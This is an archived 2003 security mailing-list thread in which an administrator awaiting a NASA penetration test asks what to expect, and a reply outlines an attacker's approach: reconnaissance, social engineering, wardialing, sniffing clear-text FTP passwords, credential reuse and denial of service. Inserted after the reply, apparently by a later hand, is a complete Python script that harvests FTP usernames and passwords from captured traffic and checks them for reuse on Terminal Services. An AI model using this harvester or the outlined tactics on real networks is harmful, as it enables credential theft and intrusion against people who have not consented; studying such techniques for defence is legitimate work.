Security Basics mailing list archives

RE: NASA Security Audit


From: "Simons, Rick" <RSIMONS () alldata net>
Date: Thu, 9 Oct 2003 07:12:08 -0500

I am fairly green to the security field, but I will offer what I can.  I
will watch this thread with interest.  8)  If my reply is in no way related
to your actual question, please feel free to delete, heh.  I tend to answer
questions I know, even if the question I answered wasn't quite the question
posed.

If you have been in the field for 2 years, I doubt any of this will be
beneficial, but I will offer it anyway.  If I were trying to get in, I would
start by footprinting your organization: IP range, phone number range,
browsing the 'official' website for valuable info about your setup and a
personnel listing.  Then I would look at the doors in (FTP, term, X phone
numbers with modems on them (from the phone number scan), Y contacts at the
location to social engineer (from the website)) and google the personnel I
could find on the website to see, like in this case, if I could find a very
descriptive list of what hardware the target was running, or perhaps some
personal pages created by employees that might help my attacks.  If one of
the posts was, like this one, very descriptive about the firewalling
solutions, I would start banging on the known vulnerabilities for those
devices.  You would be surprised how many attacks start out by reading
newsgroups or mailing lists: someone posts saying the security guru just left
and they were handed the job, have little experience in the field, etc., so
hackers who monitor said newsgroups and mailing lists open up the flood
gates.

With FTP you obviously have a clear-text password issue, so I would start
moving out from your server and try to take control of a peripheral router or
gateway so I could sniff user/pass for the service.  Chances are (perhaps
this isn't the case, but chances are) that the FTP user/pass combos work for
the term service as well.

That is all I can think of.  With possible FTP server vulnerabilities, term
service vulns, misc services that may be running, a known hardware device
list and associated old (possibly unpatched) vulns, social engineering and
wardialing, I'd say those will be hit first.  If those can garner no entry,
more head-first tactics would be used: try to DoS the hardware devices with
malformed packets, or DoS the services to prevent valid users from
connecting.  There is more than one way to skin a cat, and if I can't get in,
I would make sure nobody else could either.  Those types of attacks will
most likely NOT be employed by your penetration tester, as they are more
last-resort tactics, but something to always keep in mind and adjust
rules/timeout values/etc. appropriately.  Unfortunately, at this point this
is where my knowledge/experience fails me, so I will leave this to the more
experienced people on this list to reply.


Rick.
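The clear-text FTP point above, as an added example (this is not code from Rick's message or from anyone on the list): an attacker sitting on a router or gateway in the path sees USER and PASS on the FTP control channel in the clear. The script below reassembles that channel from packet records, pairs each PASS with the server's 230 (logged in) or 530 (rejected) reply, and then checks whether a harvested password also unlocks the corresponding Terminal Services account. The capture records, the "ip:port" endpoint strings, the Terminal Services account table and its salted SHA-256 storage format are all constructed assumptions for this example.

```python
"""FTP clear-text credential harvesting from captured TCP payloads.

Added example, not part of the original post.  The packet records,
the account table and the hashing scheme below are constructed.
"""
import hashlib
from collections import defaultdict, deque
from dataclasses import dataclass

FTP_PORT = 21


@dataclass(frozen=True)
class Packet:
    src: str        # "ip:port" of the sender (assumed record format)
    dst: str        # "ip:port" of the receiver
    payload: bytes  # raw TCP segment payload, possibly a partial line


def _port(endpoint: str) -> int:
    return int(endpoint.rsplit(":", 1)[1])


def _ip(endpoint: str) -> str:
    return endpoint.rsplit(":", 1)[0]


def harvest_ftp_logins(packets):
    """Return (successes, failures): lists of (client_ip, user, password).

    FTP is lockstep: every PASS is answered by exactly one 230 or 530
    reply, so credentials are matched to their outcome in FIFO order.
    Segments are reassembled per direction so a command split across
    packets (or two commands in one packet) is still parsed correctly.
    """
    partial = defaultdict(bytes)   # unfinished line per (src, dst)
    last_user = {}                 # session -> most recent USER argument
    pending = defaultdict(deque)   # session -> PASS attempts awaiting a reply
    successes, failures = [], []

    for pkt in packets:
        if _port(pkt.dst) == FTP_PORT:
            session, from_client = (pkt.src, pkt.dst), True
        elif _port(pkt.src) == FTP_PORT:
            session, from_client = (pkt.dst, pkt.src), False
        else:
            continue               # not FTP control traffic (e.g. 3389)

        direction = (pkt.src, pkt.dst)
        pieces = (partial[direction] + pkt.payload).split(b"\r\n")
        partial[direction] = pieces.pop()   # trailing partial line, if any
        for raw in pieces:
            line = raw.decode("ascii", errors="replace")
            if from_client:
                verb, _, arg = line.partition(" ")
                if verb.upper() == "USER":
                    last_user[session] = arg
                elif verb.upper() == "PASS":
                    pending[session].append((last_user.get(session, "?"), arg))
            else:
                code = line[:3]
                if code in ("230", "530") and pending[session]:
                    user, pw = pending[session].popleft()
                    record = (_ip(session[0]), user, pw)
                    (successes if code == "230" else failures).append(record)
    return successes, failures


def _hash_pw(salt: bytes, password: str) -> str:
    return hashlib.sha256(salt + password.encode()).hexdigest()


def find_reused_passwords(ftp_logins, ts_accounts):
    """Users whose sniffed FTP password also matches their Terminal Services
    record, stored as {user: (salt, sha256(salt + password))}.  The storage
    format is an assumption; it only serves to test reuse without keeping
    the Terminal Services passwords in the clear."""
    reused = []
    for _ip_addr, user, pw in ftp_logins:
        rec = ts_accounts.get(user)
        if rec and _hash_pw(rec[0], pw) == rec[1]:
            reused.append(user)
    return reused


# Constructed capture: two FTP sessions to 10.0.0.5:21 (one includes a
# failed attempt and a command split across segments) plus one RDP packet
# on 3389 that carries no clear-text credentials and must be ignored.
CAPTURE = [
    Packet("10.0.0.5:21", "10.0.0.20:40001", b"220 ftp.example.test ready\r\n"),
    Packet("10.0.0.20:40001", "10.0.0.5:21", b"USER alice\r\n"),
    Packet("10.0.0.5:21", "10.0.0.20:40001", b"331 Password required\r\n"),
    Packet("10.0.0.20:40001", "10.0.0.5:21", b"PASS Summer2003!\r\n"),
    Packet("10.0.0.5:21", "10.0.0.20:40001", b"230 User alice logged in\r\n"),
    Packet("10.0.0.21:40002", "10.0.0.5:21", b"USER bob\r\nPASS wrong\r\n"),
    Packet("10.0.0.5:21", "10.0.0.21:40002", b"331 Password required\r\n530 Login incorrect\r\n"),
    Packet("10.0.0.21:40002", "10.0.0.5:21", b"USER bob\r\nPA"),
    Packet("10.0.0.21:40002", "10.0.0.5:21", b"SS hunter2\r\n"),
    Packet("10.0.0.5:21", "10.0.0.21:40002", b"230 User bob logged in\r\n"),
    Packet("10.0.0.21:40003", "10.0.0.5:3389", b"\x03\x00\x00\x13\x0e\xe0\x00\x00"),
]

# Constructed Terminal Services account table (assumed format, see above).
TS_ACCOUNTS = {
    "alice": (b"s1", _hash_pw(b"s1", "Summer2003!")),  # same password as FTP
    "bob":   (b"s2", _hash_pw(b"s2", "Tr0ub4dor&3")),  # different password
}

if __name__ == "__main__":
    ok, bad = harvest_ftp_logins(CAPTURE)
    for ip_addr, user, pw in ok:
        print(f"[+] {ip_addr} logged in as {user!r} with password {pw!r}")
    for ip_addr, user, pw in bad:
        print(f"[-] {ip_addr} failed login as {user!r} with {pw!r}")
    print("reused on Terminal Services:", find_reused_passwords(ok, TS_ACCOUNTS))
```

Two things the parser has to get right are visible in the constructed capture: a single packet may carry two commands, and one command may straddle two segments, so lines are reassembled per direction before any USER/PASS matching; and a PASS is only attributed to an outcome once the matching 230 or 530 arrives, so a failed attempt is not reported as a working credential. The reuse check is the defender's side of Rick's point: if any name comes back from it, the FTP requirement has effectively exposed the Terminal Services password too.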

-----Original Message-----
From: Gregory M. Brown [mailto:gbrown () alvalearning com]
Sent: Wednesday, October 08, 2003 12:49 PM
To: SECURITY-BASICS () SECURITYFOCUS COM
Subject: NASA Security Audit


Well it looks as though I am finally going to be tested by the Feds.
According to my CTO, a guy named Jay Diceman will be the point man.
Anyone ever hear of him?  I hear he is a well known security expert
(ex-hacker?) for the federal government.  I have downloaded the Evaluated
Security Configuration document created for Microsoft by Science
Applications International Corporation.  There are actually 2 of these.
I think those .pdf's cover the Microsoft component.  I don't even want
him to get as far as any MS box.  I am fairly new to security (2 years)
and my final exam is going to be a "Black Box" test and a "Crystal" test
from some heinously gifted hacker from NASA...

1.  What exactly will these 2 forms of intrusion concentrate on?

2.  Is my hardware up to the task?  I currently have a Fortigate
Fortinet 50 configured for intrusion detection and prevention.  I am
currently blocking 1300+ known attacks.  My FW is a CheckPoint Celestix
with a physical DMZ path.  The only questionable services allowed
through are FTP (requirement) and Terminal Services (requirement).

3.  What can I expect?  Any input is GREATLY appreciated.

Thanks.  Man I hope I still have a job in 2 weeks!
gb
